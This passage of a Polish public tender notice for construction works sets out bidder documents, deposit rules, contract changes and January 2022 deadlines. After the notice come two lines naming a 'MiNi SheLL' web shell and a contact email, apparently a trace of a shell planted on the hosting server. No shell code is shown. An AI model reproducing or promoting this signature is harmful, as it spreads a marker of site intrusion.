wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej specjalności. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w<br/>postępowaniu na wezwanie Zamawiającego Wykonawca zobowiązany będzie do złożenia<br/>następujących dokumentów:<br/>1) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie zgodnie z Załącznikiem<br/>nr 5 do SWZ, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/>2) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami zgodnie z<br/>Załącznikiem nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą Wykonawca zobowiązany jest złożyć:<br/>1. oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu z<br/>postępowania oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez<br/>Zamawiającego – zgodnie z Załącznikiem Nr 2A do SWZ;<br/>− w przypadku wspólnego ubiegania się o zamówienie przez wielu wykonawców, oświadczenie<br/>składa każdy z wykonawców, oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu;<br/>− w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby<br/>Wykonawca przedstawia także oświadczenie podmiotu udostępniającego zasoby<br/>potwierdzającego brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w<br/>jakim wykonawca powołuje się na jego zasoby – zgodnie z Załącznikiem Nr 2B do SWZ;<br/>2) dokument potwierdzający umocowanie do reprezentowania Wykonawcy, jeżeli w imieniu<br/>Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z odpisu lub<br/>informacji Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru,<br/>3) pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w<br/>sprawie zamówienia publicznego (jeżeli dotyczy);<br/>4) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, składane na<br/>podstawie art. 117 ust. 4 ustawy, z którego wynika, które roboty budowlane wykonają<br/>poszczególni wykonawcy - zgodnie z Załącznikiem Nr 3 do SWZ (jeżeli dotyczy),<br/>5) zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji danego zamówienia (zgodnie z Załącznikiem Nr 4<br/>do SWZ) lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów w przypadku polegania<br/>na zdolnościach innych podmiotów (jeżeli dotyczy),<br/>6) dokument potwierdzający wpłacenie lub wniesienie wadium,<br/>7) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru w celu potwierdzenia, że osoba<br/>działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania.<br/>Wykonawca nie jest zobowiązany do złożenia ww. dokumentu, jeżeli zamawiający może go<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał<br/>dane umożliwiające dostęp do tego dokumentu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Oferta musi być zabezpieczona wadium w wysokości 20 000,00 zł (słownie: dwadzieścia tysięcy<br/>złotych 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2<br/>i 3 oraz ust. 2 ustawy.<br/>3. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących<br/>formach:<br/>1) pieniądzu<br/>2) gwarancjach bankowych<br/>3) gwarancjach ubezpieczeniowych<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2019 r. poz. 310, 836 i 1572).<br/>4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez<br/>zamawiającego: Bank Spółdzielczy Koronowo O/Śliwice 30 8144 0005 2006 0060 4514 0004.<br/>Za termin wniesienia wadium w pieniądzu przyjmuje się datę i godzinę uznania na rachunku<br/>bankowym Zamawiającego, a nie datę wydania dyspozycji przelewu.<br/>5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 3 pkt<br/>2-4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci<br/>elektronicznej. 6. Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia<br/>wystąpienia jednej z okoliczności:<br/>1) upływu terminu związania ofertą;<br/>2) zawarcia umowy w sprawie zamówienia publicznego;<br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało<br/>rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>7. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku<br/>zwraca wadium wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert;<br/>2) którego oferta została odrzucona;<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana<br/>jako najkorzystniejsza;<br/>4) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na<br/>czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>8. Złożenie wniosku o zwrot wadium, o którym mowa w ust. 7, powoduje rozwiązanie stosunku<br/>prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale IX ustawy.<br/>9. Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy<br/>rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia<br/>rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy<br/>wskazany przez wykonawcę.<br/>10. Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie<br/>gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium.<br/>11. Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w<br/>formie gwarancji lub poręczenia, o których mowa w ust. 3 pkt 2-4, występuje odpowiednio do<br/>gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli:<br/>1) Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1<br/>ustawy, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub<br/>przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57<br/>lub art. 106 ust. 1 ustawy, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy, innych<br/>dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art.<br/>223 ust. 2 pkt 3 ustawy, co spowodowało brak możliwości wybrania oferty złożonej przez<br/>wykonawcę jako najkorzystniejszej;<br/>2) Wykonawca, którego oferta została wybrana:<br/>a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w<br/>ofercie,<br/>b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy<br/>3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn<br/>leżących po stronie Wykonawcy, którego oferta została wybrana. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa w ust. 1, wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Stosowne pełnomocnictwo<br/>należy złożyć wraz z ofertą.<br/>3. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>4. Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań<br/>dotyczących robót budowlanych. 5. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez wielu Wykonawców,<br/>oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp<br/>o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału<br/>w postępowaniu w zakresie wskazanym przez Zamawiającego składa każdy<br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane.<br/>W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.W przypadku zmiany wysokości obowiązującej stawki podatku VAT w sytuacji, gdy w trakcie<br/>realizacji przedmiotu umowy nastąpi zmiana stawki podatku VAT dla robót objętych<br/>przedmiotem umowy Zamawiający dopuszcza możliwość zmiany wysokości wynagrodzenia,<br/>określonego w umowie – zmianie ulega wartość brutto, wartość netto pozostaje bez zmian.<br/>2.W przypadku zmiany regulacji prawnych odnoszących się do praw i obowiązków stron umowy,<br/>wprowadzonych po jej zawarciu, wywołujących potrzebę zmiany sposobu realizacji umowy,<br/>Zamawiający dopuszcza możliwość zmiany sposobu realizacji umowy, wysokości<br/>wynagrodzenia określonego w umowie, lub terminu zakończenia realizacji przedmiotu umowy.<br/>3.W przypadku przestojów lub opóźnień w realizacji przedmiotu umowy, wywołanych<br/>przyczynami niezależnymi od stron umowy.<br/>4. W przypadku zaistnienia okoliczności związanych z wystąpieniem i utrzymywaniem się stanu<br/>zagrożenia epidemicznego lub stanu epidemii, wpływających lub mogących wpłynąć na należyte<br/>wykonanie umowy zamawiający, dopuszcza zmianę terminu realizacji zamówienia, czasowe<br/>zawieszenie wykonywania umowy, zmianę sposobu wykonywania umowy, zmianę technologii<br/>robót, oraz zmianę wynagrodzenia wykonawcy lub ograniczenie zakresu robót.<br/>5. W przypadku konieczności zmiany technologii wykonywania przedmiotu umowy,<br/>zastosowania rozwiązań zamiennych, zastępczych lub równoważnych, Zamawiający dopuszcza<br/>zmianę technologii wykonywania robót - w celu prawidłowego wykonania przedmiotu umowy<br/>oraz zmianę wynagrodzenia, określonego w umowie, w zakresie uwzględniającym zmienioną<br/>technologię oraz jeżeli w skutek wprowadzenia zmian wystąpi opóźnienie, bądź przewidywany<br/>okres realizacji robót w zmienionej technologii będzie dłuższy od dotychczasowego,<br/>Zamawiający dopuszcza możliwość zmiany terminu zakończenia realizacji przedmiotu umowy, o<br/>okres takiego opóźnienia lub o czas niezbędny do realizacji robót w zmienionej technologii oraz<br/>zmianę wynagrodzenia.<br/>6. W przypadku, gdy z przyczyn technicznych, które nie mogły być przewidziane przez<br/>Zamawiającego pomimo dołożenia należytej staranności lub które ujawniły się podczas<br/>wykonywania prac, lub gdy jest to korzystne dla interesu publicznego lub interesu<br/>Zamawiającego w zakresie, w jakim korzyść może polegać na zmianach mających wpływ.<br/>W przypadku działania siły wyższej rozumianej jako wszystkie zdarzenia zewnętrzne niemożliwe do przewidzenia i niemożliwe do zapobieżenia przez Stronę lub Strony umowy, a zaistniałe po<br/>zawarciu umowy.<br/>Szczegółowe warunki opisane są w projekcie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu https://miniportal.uzp.gov.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-12 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Inwestycja jest finansowana ze środków Rządowego Funduszu Inwestycji Lokalnych.

Creat By MiNi SheLL
Email: jattceo@gmail.com